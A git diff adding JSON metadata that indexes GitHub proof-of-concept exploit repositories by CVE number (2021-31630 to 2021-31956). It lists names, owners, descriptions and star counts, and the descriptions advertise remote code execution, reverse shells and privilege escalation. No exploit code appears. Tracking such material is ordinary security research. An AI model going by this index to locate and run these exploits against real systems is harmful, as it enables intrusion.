"2024-06-04T00:46:34Z", + "pushed_at": "2024-06-04T00:46:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 818448931, + "name": "cve-2021-31630", + "full_name": "adibabdala123\/cve-2021-31630", + "owner": { + "login": "adibabdala123", + "id": 76139191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76139191?v=4", + "html_url": "https:\/\/github.com\/adibabdala123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adibabdala123\/cve-2021-31630", + "description": "This is a automation of cve-2021-31630 exploitation", + "fork": false, + "created_at": "2024-06-21T22:10:49Z", + "updated_at": "2024-06-29T17:40:49Z", + "pushed_at": "2024-06-29T17:40:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 833217533, + "name": "CVE-2021-31630", + "full_name": "manuelsantosiglesias\/CVE-2021-31630", + "owner": { + "login": "manuelsantosiglesias", + "id": 29311335, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29311335?v=4", + "html_url": "https:\/\/github.com\/manuelsantosiglesias", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/manuelsantosiglesias\/CVE-2021-31630", + "description": "OpenPLC 3 WebServer Authenticated Remote Code Execution.", + "fork": false, + "created_at": "2024-07-24T15:28:47Z", + "updated_at": "2024-07-24T16:22:41Z", + "pushed_at": "2024-07-24T16:22:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 834167517, + "name": "CVE-2021-31630", + "full_name": "FlojBoj\/CVE-2021-31630", + "owner": { + "login": "FlojBoj", + "id": 170850781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170850781?v=4", + "html_url": "https:\/\/github.com\/FlojBoj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FlojBoj\/CVE-2021-31630", + "description": "POC Exploit for CVE-2021-31630 written in Python3 and using C reverse shell with non-blocking mode", + "fork": false, + "created_at": "2024-07-26T15:06:44Z", + "updated_at": "2024-07-27T14:33:18Z", + "pushed_at": "2024-07-27T14:33:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3164.json b/2021/CVE-2021-3164.json new file mode 100644 index 0000000000..240c12e300 --- /dev/null +++ b/2021/CVE-2021-3164.json @@ -0,0 +1,33 @@ +[ + { + "id": 331173610, + "name": "cve-2021-3164", + "full_name": "rmccarth\/cve-2021-3164", + "owner": { + "login": "rmccarth", + "id": 36937649, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36937649?v=4", + "html_url": "https:\/\/github.com\/rmccarth", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rmccarth\/cve-2021-3164", + "description": "Church Rota version 2.6.4 is vulnerable to authenticated remote code execution. The user does not need to have file upload permission in order to upload and execute an arbitrary file. The application is written primarily with PHP so we use PHP in our PoC ", + "fork": false, + "created_at": "2021-01-20T02:48:46Z", + "updated_at": "2021-10-16T06:43:27Z", + "pushed_at": "2021-01-20T02:49:27Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3166.json b/2021/CVE-2021-3166.json new file mode 100644 index 0000000000..58db4ccf92 --- /dev/null +++ b/2021/CVE-2021-3166.json @@ -0,0 +1,33 @@ +[ + { + "id": 567852588, + "name": "CVE-2021-3166", + "full_name": "kaisersource\/CVE-2021-3166", + "owner": { + "login": "kaisersource", + "id": 20024395, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20024395?v=4", + "html_url": "https:\/\/github.com\/kaisersource", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kaisersource\/CVE-2021-3166", + "description": "Mastering CVE-2021-3166", + "fork": false, + "created_at": "2022-11-18T18:28:57Z", + "updated_at": "2022-11-18T18:28:57Z", + "pushed_at": "2022-11-18T18:33:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-31728.json b/2021/CVE-2021-31728.json new file mode 100644 index 0000000000..70df359d41 --- /dev/null +++ b/2021/CVE-2021-31728.json @@ -0,0 +1,37 @@ +[ + { + "id": 364331767, + "name": "CVE-2021-31728", + "full_name": "irql\/CVE-2021-31728", + "owner": { + "login": "irql", + "id": 38012156, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38012156?v=4", + "html_url": "https:\/\/github.com\/irql", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/irql\/CVE-2021-31728", + "description": "vulnerability in zam64.sys, zam32.sys allowing ring 0 code execution. CVE-2021-31727 and CVE-2021-31728 public reference.", + "fork": false, + "created_at": "2021-05-04T17:15:58Z", + "updated_at": "2024-09-24T07:23:22Z", + "pushed_at": "2021-05-10T20:42:33Z", + "stargazers_count": 89, + "watchers_count": 89, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-31727", + "cve-2021-31728", + "vulnerability" + ], + "visibility": "public", + "forks": 24, + "watchers": 89, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-31755.json b/2021/CVE-2021-31755.json new file mode 100644 index 0000000000..80bfee299c --- /dev/null +++ b/2021/CVE-2021-31755.json @@ -0,0 +1,39 @@ +[ + { + "id": 877974401, + "name": "CVE-2021-31755", + "full_name": "r3s3tt\/CVE-2021-31755", + "owner": { + "login": "r3s3tt", + "id": 186166201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/186166201?v=4", + "html_url": "https:\/\/github.com\/r3s3tt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r3s3tt\/CVE-2021-31755", + "description": "POC cve-2021-31755", + "fork": false, + "created_at": "2024-10-24T15:01:17Z", + "updated_at": "2024-11-28T15:01:34Z", + "pushed_at": "2024-10-24T15:02:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2021-31755", + "exploit", + "poc", + "poc-cve-2021-31755" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-31760.json b/2021/CVE-2021-31760.json new file mode 100644 index 0000000000..bbd184edf1 --- /dev/null +++ b/2021/CVE-2021-31760.json @@ -0,0 +1,64 @@ +[ + { + "id": 359983710, + "name": "CVE-2021-31760", + "full_name": "Mesh3l911\/CVE-2021-31760", + "owner": { + "login": "Mesh3l911", + "id": 74990355, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74990355?v=4", + "html_url": "https:\/\/github.com\/Mesh3l911", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mesh3l911\/CVE-2021-31760", + "description": "Exploiting a Cross-site request forgery (CSRF) attack to get a Remote Command Execution (RCE) through the Webmin's running process feature", + "fork": false, + "created_at": "2021-04-21T00:09:54Z", + "updated_at": "2021-04-29T02:55:07Z", + "pushed_at": "2021-04-24T20:07:02Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 360287311, + "name": "CVE-2021-31760", + "full_name": "electronicbots\/CVE-2021-31760", + "owner": { + "login": "electronicbots", + "id": 37217081, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37217081?v=4", + "html_url": "https:\/\/github.com\/electronicbots", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/electronicbots\/CVE-2021-31760", + "description": "Exploiting a Cross-site request forgery (CSRF) attack to get a Remote Command Execution (RCE) through the Webmin's running process feature", + "fork": false, + "created_at": "2021-04-21T19:43:53Z", + "updated_at": "2022-12-05T03:51:06Z", + "pushed_at": "2021-04-24T22:06:53Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-31761.json b/2021/CVE-2021-31761.json new file mode 100644 index 0000000000..b71b0c8e0e --- /dev/null +++ b/2021/CVE-2021-31761.json @@ -0,0 +1,64 @@ +[ + { + "id": 360288017, + "name": "CVE-2021-31761", + "full_name": "Mesh3l911\/CVE-2021-31761", + "owner": { + "login": "Mesh3l911", + "id": 74990355, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74990355?v=4", + "html_url": "https:\/\/github.com\/Mesh3l911", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mesh3l911\/CVE-2021-31761", + "description": "Exploiting a Reflected Cross-Site Scripting (XSS) attack to get a Remote Command Execution (RCE) through the Webmin's running process feature", + "fork": false, + "created_at": "2021-04-21T19:46:43Z", + "updated_at": "2022-11-11T20:17:25Z", + "pushed_at": "2021-04-24T20:08:12Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 360291163, + "name": "CVE-2021-31761", + "full_name": "electronicbots\/CVE-2021-31761", + "owner": { + "login": "electronicbots", + "id": 37217081, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37217081?v=4", + "html_url": "https:\/\/github.com\/electronicbots", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/electronicbots\/CVE-2021-31761", + "description": "Exploiting a Reflected Cross-Site Scripting (XSS) attack to get a Remote Command Execution (RCE) through the Webmin's running process feature", + "fork": false, + "created_at": "2021-04-21T20:00:09Z", + "updated_at": "2022-12-05T03:51:41Z", + "pushed_at": "2021-04-24T22:08:16Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 4, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-31762.json b/2021/CVE-2021-31762.json new file mode 100644 index 0000000000..3eaa517515 --- /dev/null +++ b/2021/CVE-2021-31762.json @@ -0,0 +1,64 @@ +[ + { + "id": 360292539, + "name": "CVE-2021-31762", + "full_name": "Mesh3l911\/CVE-2021-31762", + "owner": { + "login": "Mesh3l911", + "id": 74990355, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74990355?v=4", + "html_url": "https:\/\/github.com\/Mesh3l911", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mesh3l911\/CVE-2021-31762", + "description": "Exploiting a Cross-site request forgery (CSRF) attack to creat a new privileged user through the Webmin's add users feature", + "fork": false, + "created_at": "2021-04-21T20:06:09Z", + "updated_at": "2021-05-19T00:05:17Z", + "pushed_at": "2021-04-24T20:10:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 360294065, + "name": "CVE-2021-31762", + "full_name": "electronicbots\/CVE-2021-31762", + "owner": { + "login": "electronicbots", + "id": 37217081, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37217081?v=4", + "html_url": "https:\/\/github.com\/electronicbots", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/electronicbots\/CVE-2021-31762", + "description": "Exploiting a Cross-site request forgery (CSRF) attack to creat a new privileged user through the Webmin's add users feature ", + "fork": false, + "created_at": "2021-04-21T20:13:06Z", + "updated_at": "2024-08-12T20:12:22Z", + "pushed_at": "2021-04-24T22:05:36Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-31796.json b/2021/CVE-2021-31796.json new file mode 100644 index 0000000000..ec0a537213 --- /dev/null +++ b/2021/CVE-2021-31796.json @@ -0,0 +1,33 @@ +[ + { + "id": 88706883, + "name": "CACredDecoder", + "full_name": "unmanarc\/CACredDecoder", + "owner": { + "login": "unmanarc", + "id": 7947734, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7947734?v=4", + "html_url": "https:\/\/github.com\/unmanarc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/unmanarc\/CACredDecoder", + "description": "C-Ark Credential Decoder for #CVE-2021-31796", + "fork": false, + "created_at": "2017-04-19T06:01:08Z", + "updated_at": "2023-02-21T16:26:07Z", + "pushed_at": "2021-10-11T17:59:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-31800.json b/2021/CVE-2021-31800.json new file mode 100644 index 0000000000..e1f38feca1 --- /dev/null +++ b/2021/CVE-2021-31800.json @@ -0,0 +1,72 @@ +[ + { + "id": 529954227, + "name": "CVE-2021-31800-Impacket-SMB-Server-Arbitrary-file-read-write", + "full_name": "p0dalirius\/CVE-2021-31800-Impacket-SMB-Server-Arbitrary-file-read-write", + "owner": { + "login": "p0dalirius", + "id": 79218792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79218792?v=4", + "html_url": "https:\/\/github.com\/p0dalirius", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p0dalirius\/CVE-2021-31800-Impacket-SMB-Server-Arbitrary-file-read-write", + "description": "A path traversal in smbserver.py allows an attacker to read\/write arbitrary files on the server.", + "fork": false, + "created_at": "2022-08-28T19:04:46Z", + "updated_at": "2024-07-05T16:19:36Z", + "pushed_at": "2023-01-19T11:06:33Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "arbitrary", + "cve-2021-31800", + "file", + "impacket", + "read", + "smbserver", + "write" + ], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 531854393, + "name": "CVE-2021-31800", + "full_name": "Louzogh\/CVE-2021-31800", + "owner": { + "login": "Louzogh", + "id": 38815386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38815386?v=4", + "html_url": "https:\/\/github.com\/Louzogh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Louzogh\/CVE-2021-31800", + "description": "CVE-2021-31800 POC", + "fork": false, + "created_at": "2022-09-02T09:02:19Z", + "updated_at": "2022-11-10T01:00:33Z", + "pushed_at": "2022-09-02T10:27:27Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-31805.json b/2021/CVE-2021-31805.json new file mode 100644 index 0000000000..0d53f2d23d --- /dev/null +++ b/2021/CVE-2021-31805.json @@ -0,0 +1,250 @@ +[ + { + "id": 481804043, + "name": "s2-062", + "full_name": "pyroxenites\/s2-062", + "owner": { + "login": "pyroxenites", + "id": 75877299, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75877299?v=4", + "html_url": "https:\/\/github.com\/pyroxenites", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pyroxenites\/s2-062", + "description": "远程代码执行S2-062 CVE-2021-31805验证POC", + "fork": false, + "created_at": "2022-04-15T01:50:14Z", + "updated_at": "2024-11-15T03:03:52Z", + "pushed_at": "2022-04-17T08:19:59Z", + "stargazers_count": 131, + "watchers_count": 131, + "has_discussions": false, + "forks_count": 54, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 54, + "watchers": 131, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 481835287, + "name": "CVE-2021-31805", + "full_name": "Wrin9\/CVE-2021-31805", + "owner": { + "login": "Wrin9", + "id": 54984589, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54984589?v=4", + "html_url": "https:\/\/github.com\/Wrin9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wrin9\/CVE-2021-31805", + "description": "S2-062 (CVE-2021-31805) \/ S2-061 \/ S2-059 RCE", + "fork": false, + "created_at": "2022-04-15T04:23:44Z", + "updated_at": "2024-08-12T20:22:25Z", + "pushed_at": "2022-04-15T08:52:11Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 35, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 481922385, + "name": "Struts2_S2-062_CVE-2021-31805", + "full_name": "Axx8\/Struts2_S2-062_CVE-2021-31805", + "owner": { + "login": "Axx8", + "id": 34683107, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34683107?v=4", + "html_url": "https:\/\/github.com\/Axx8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Axx8\/Struts2_S2-062_CVE-2021-31805", + "description": "Apache Struts2 S2-062远程代码执行漏洞(CVE-2021-31805) | 反弹Shell", + "fork": false, + "created_at": "2022-04-15T10:28:29Z", + "updated_at": "2024-08-12T20:22:26Z", + "pushed_at": "2022-04-18T14:21:35Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 481937119, + "name": "S2-062", + "full_name": "jax7sec\/S2-062", + "owner": { + "login": "jax7sec", + "id": 102047728, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102047728?v=4", + "html_url": "https:\/\/github.com\/jax7sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jax7sec\/S2-062", + "description": "Apache Struts2 S2-062远程代码执行漏洞(CVE-2021-31805) 支持批量扫描漏洞及漏洞利用", + "fork": false, + "created_at": "2022-04-15T11:30:26Z", + "updated_at": "2024-08-12T20:22:26Z", + "pushed_at": "2022-04-15T15:25:08Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 23, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 482013810, + "name": "CVE-2021-31805", + "full_name": "aeyesec\/CVE-2021-31805", + "owner": { + "login": "aeyesec", + "id": 61375985, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61375985?v=4", + "html_url": "https:\/\/github.com\/aeyesec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aeyesec\/CVE-2021-31805", + "description": " PoC for CVE-2021-31805 (Apache Struts2)", + "fork": false, + "created_at": "2022-04-15T16:09:52Z", + "updated_at": "2024-08-02T06:57:19Z", + "pushed_at": "2022-04-22T05:24:48Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 482736902, + "name": "CVE-2021-31805-POC", + "full_name": "fleabane1\/CVE-2021-31805-POC", + "owner": { + "login": "fleabane1", + "id": 58097248, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58097248?v=4", + "html_url": "https:\/\/github.com\/fleabane1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fleabane1\/CVE-2021-31805-POC", + "description": "Apache Struts2 S2-062(CVE-2021-31805)远程代码执行批量检测(无利用)", + "fork": false, + "created_at": "2022-04-18T06:17:59Z", + "updated_at": "2022-11-17T07:23:18Z", + "pushed_at": "2022-04-18T05:31:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 512460959, + "name": "CVE-2021-31805", + "full_name": "z92g\/CVE-2021-31805", + "owner": { + "login": "z92g", + "id": 108780847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108780847?v=4", + "html_url": "https:\/\/github.com\/z92g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z92g\/CVE-2021-31805", + "description": "S2-061\/S2-062 Struts2 远程命令执行漏洞 POC&EXP", + "fork": false, + "created_at": "2022-07-10T14:48:52Z", + "updated_at": "2024-01-30T19:34:04Z", + "pushed_at": "2022-07-23T15:31:30Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 674477369, + "name": "CVE-2021-31805", + "full_name": "nth347\/CVE-2021-31805", + "owner": { + "login": "nth347", + "id": 20441996, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20441996?v=4", + "html_url": "https:\/\/github.com\/nth347", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nth347\/CVE-2021-31805", + "description": "Vulnerable environment of CVE-2021-31805 (S2-062) for testing", + "fork": false, + "created_at": "2023-08-04T03:42:37Z", + "updated_at": "2023-08-04T03:46:31Z", + "pushed_at": "2023-08-04T03:46:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-31856.json b/2021/CVE-2021-31856.json new file mode 100644 index 0000000000..94b31fbbb3 --- /dev/null +++ b/2021/CVE-2021-31856.json @@ -0,0 +1,33 @@ +[ + { + "id": 364492629, + "name": "CVE-2021-31856", + "full_name": "ssst0n3\/CVE-2021-31856", + "owner": { + "login": "ssst0n3", + "id": 16935049, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16935049?v=4", + "html_url": "https:\/\/github.com\/ssst0n3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ssst0n3\/CVE-2021-31856", + "description": null, + "fork": false, + "created_at": "2021-05-05T07:18:26Z", + "updated_at": "2021-05-05T08:55:20Z", + "pushed_at": "2021-05-05T08:55:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-31862.json b/2021/CVE-2021-31862.json new file mode 100644 index 0000000000..960713c6c4 --- /dev/null +++ b/2021/CVE-2021-31862.json @@ -0,0 +1,33 @@ +[ + { + "id": 422103769, + "name": "CVE-2021-31862", + "full_name": "RobertDra\/CVE-2021-31862", + "owner": { + "login": "RobertDra", + "id": 68341018, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68341018?v=4", + "html_url": "https:\/\/github.com\/RobertDra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RobertDra\/CVE-2021-31862", + "description": null, + "fork": false, + "created_at": "2021-10-28T07:18:01Z", + "updated_at": "2022-02-17T10:12:18Z", + "pushed_at": "2021-11-01T12:56:12Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-31955.json b/2021/CVE-2021-31955.json new file mode 100644 index 0000000000..3b55d16ce0 --- /dev/null +++ b/2021/CVE-2021-31955.json @@ -0,0 +1,33 @@ +[ + { + "id": 380408979, + "name": "CVE-2021-31955-POC", + "full_name": "freeide\/CVE-2021-31955-POC", + "owner": { + "login": "freeide", + "id": 33774184, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33774184?v=4", + "html_url": "https:\/\/github.com\/freeide", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/freeide\/CVE-2021-31955-POC", + "description": null, + "fork": false, + "created_at": "2021-06-26T03:59:38Z", + "updated_at": "2024-11-12T12:49:52Z", + "pushed_at": "2021-06-26T03:23:29Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 20, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-31956.json b/2021/CVE-2021-31956.json new file mode 100644 index 0000000000..bb8e9de69b --- /dev/null +++ b/2021/CVE-2021-31956.json @@ -0,0 +1,95 @@ +[ + { + "id": 430644904, + "name": "CVE-2021-31956", + "full_name": "hzshang\/CVE-2021-31956", + "owner": { + "login": "hzshang", + "id": 18522752, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18522752?v=4", + "html_url": "https:\/\/github.com\/hzshang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hzshang\/CVE-2021-31956", + "description": null, + "fork": false, + "created_at": "2021-11-22T09:37:46Z", + "updated_at": "2022-11-01T02:46:31Z", + "pushed_at": "2021-11-22T10:01:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 531882270, + "name": "CVE-2021-31956", + "full_name": "Y3A\/CVE-2021-31956", + "owner": { + "login": "Y3A", + "id": 62646606, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62646606?v=4", + "html_url": "https:\/\/github.com\/Y3A", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Y3A\/CVE-2021-31956", + "description": "Win10 20H2 LPE for CVE-2021-31956", + "fork": false, + "created_at": "2022-09-02T10:35:11Z", + "updated_at": "2024-05-18T18:32:10Z", + "pushed_at": "2022-09-02T10:40:04Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 649472205, + "name": "CVE-2021-31956-POC", + "full_name": "hoangprod\/CVE-2021-31956-POC", + "owner": { + "login": "hoangprod", + "id": 41701929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41701929?v=4", + "html_url": "https:\/\/github.com\/hoangprod", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hoangprod\/CVE-2021-31956-POC", + "description": null, + "fork": false, + "created_at": "2023-06-05T00:03:10Z", + "updated_at": "2024-09-27T03:59:10Z", + "pushed_at": "2023-06-05T14:20:49Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-32099.json 